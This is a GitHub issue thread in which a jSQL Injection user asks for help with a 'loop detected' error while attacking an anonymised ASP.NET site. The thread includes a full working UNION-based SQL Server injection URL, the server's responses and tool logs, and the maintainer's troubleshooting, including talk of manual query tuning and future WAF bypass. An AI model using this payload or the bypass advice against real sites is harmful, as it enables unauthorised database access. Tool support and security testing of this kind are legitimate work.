### ISSUE TITLE
Loop detected during injection

### ISSUE THREAD

**Issue by sapocxp** [ron190/jsql-injection#59900]
Hello seem jsql cannot load db information . my target is vulernable.
but show this error
"Loop detected during injection, job stopped" 

jsql output:
Checking insertion characters...
[04:13:57,096] Type of database forced by user to [SQL Server]
[04:13:57,096] Checking strategy Time...
[04:14:16,947] Vulnerable to Time injection
[04:14:16,947] Checking strategy Blind...
[04:14:25,400] No Error strategy known for SQL Server
[04:14:25,400] Checking strategy Normal...
[04:14:33,578] Vulnerable to Normal injection using 26 characters
[04:14:33,578] Using strategy [Normal]
[04:14:33,578] Fetching informations...
[04:15:11,384] Loop detected during injection, job stopped

i am use "jSQL Injection v0.81 "

how to fix it?

**Comment by ron190** [comment]
Hello, the message `Loop detected` occurs only when 20 successives SQL queries are returning exactly the same result, it's just a security behavior to avoid infinite loop in the program.

I'm seeing in your message log that only 26 characters are returned by the server for each request, so the server is returning the same 26 characters many times.

Can you check the 20 last requests in the tab Network to know what these 26 characters are ?

If the 26 characters are real then my guess is that it's either:

- a problem in the database,
- a problem in the SQL query,
- a row in the table containing a big block of characters, like `###################...` and so on.

Otherwise if the responses contain empty result then the server can be protected against injection (WAF).

I'm planning to add Tampering features in order to bypass WAF automatically but until then you can use the tab SQL Engine to manually tune the SQL queries.

**Comment by sapocxp** [comment]
thanks ron190

jsql complete output:

network tab:

URL:
http://website.com/News-More.aspx?id=9120+union+select+CONVERT(varchar,(1)),CONVERT(varchar,((select'SqLi'%2Bsubstring((SELECT%20@@version%2B'%04'%2BDB_NAME()%2B'%04'%2Buser%2B'%01%03%03%07'),105,65536)))),CONVERT(varchar,(1)),CONVERT(varchar,(1)),CONVERT(varchar,(1)),CONVERT(varchar,(1)),CONVERT(varchar,(1)),CONVERT(varchar,(1)),CONVERT(varchar,(1)),CONVERT(varchar,(1)),CONVERT(varchar,(1))&title=1--+

Response:

Cache-Control: private
Server: Microsoft-IIS/8.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=uo1yco55dmzdrdqcuncwn145; path=/; HttpOnly
Method: HTTP/1.1 200 OK
X-Powered-By-Plesk: PleskWin
Content-Length: 25735
Date: Wed, 29 Nov 2017 16:00:09 GMT
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET

Request

is null

-----------------------------------------------------------------------------------
Chunk tab

'%2bsubstring((SELECT+%40%
'%2bsubstring((SELECT+%40%
'%2bsubstring((SELECT+%40%
'%2bsubstring((SELECT+%40%
'%2bsubstring((SELECT+%40%
'%2bsubstring((SELECT+%40%
'%2bsubstring((SELECT+%40%
'%2bsubstring((SELECT+%40%
'%2bsubstring((SELECT+%40%
'%2bsubstring((SELECT+%40%
'%2bsubstring((SELECT+%40%
'%2bsubstring((SELECT+%40%
'%2bsubstring((SELECT+%40%
'%2bsubstring((SELECT+%40%
'%2bsubstring((SELECT+%40%
'%2bsubstring((SELECT+%40%
'%2bsubstring((SELECT+%40%
'%2bsubstring((SELECT+%40%
'%2bsubstring((SELECT+%40%
'%2bsubstring((SELECT+%40%
-----------------------------------------------------------------------------------
Boolean Tab

	Time strategy: request is true if delay does not exceed 5 seconds.
------------------------------------------------------------------------------------
Console Tab

[19:44:03,032] Connection test...
[19:44:11,057] Found status HTTP 200 Success
[19:44:11,738] Found 1 <form> in HTML body while status 200 Success:
<form action="News-More.aspx?id=9120&title=1" method="post" />
    <input name="__VIEWSTATE" value="/wEPDwUKMjA4NjcwMDk0MmQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgIFEmN0bDAwJEltYWdlQnV0dG9uMQUSY3RsMDAkSW1hZ2VCdXR0b24y0LVzIJppDWZ5XrDMuQytton3hjo=" />
    <input name="__VIEWSTATEGENERATOR" value="9CFAC353" />
    <input name="__VIEWSTATE" value="/wEPDwUKMjA4NjcwMDk0MmQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgIFEmN0bDAwJEltYWdlQnV0dG9uMQUSY3RsMDAkSW1hZ2VCdXR0b24y0LVzIJppDWZ5XrDMuQytton3hjo=" />
[19:44:11,744] Checking single QUERY parameter with injection point at *
[19:44:11,744] Checking insertion characters...
[19:44:11,745] Type of database forced by user to [SQL Server]
[19:44:11,745] Checking strategy Time...
[19:44:27,267] Vulnerable to Time injection
[19:44:27,267] Checking strategy Blind...
[19:44:38,017] No Error strategy known for SQL Server
[19:44:38,017] Checking strategy Normal...
[19:44:46,088] Vulnerable to Normal injection using 26 characters
[19:44:46,088] Using strategy [Normal]
[19:44:46,091] Fetching informations...
[19:45:13,385] Loop detected during injection, job stopped

**Comment by ron190** [comment]
For whatever reason it seems that the website adds the URL called by jSQL to the webpage's source, so jSQL detects the tag `SqLi` from the URL and read chars after the tag in order to get the result from the database but it gets data from the URL instead:

`http://website.com/...(varchar,((select'SqLi'%2Bsubstring((SELECT%20@@version`
`--------------------------------------------^`

Usually the reason for that is a server error ; which website in the world displays the URL you just literally called in its body :) ?

You can use the tab Network again, select the last URL called in the list and click on tab Preview to display the content or the source and watch for the server error in it.

From here manual tuning of SQL query may be of interest to understand what is causing the server error.
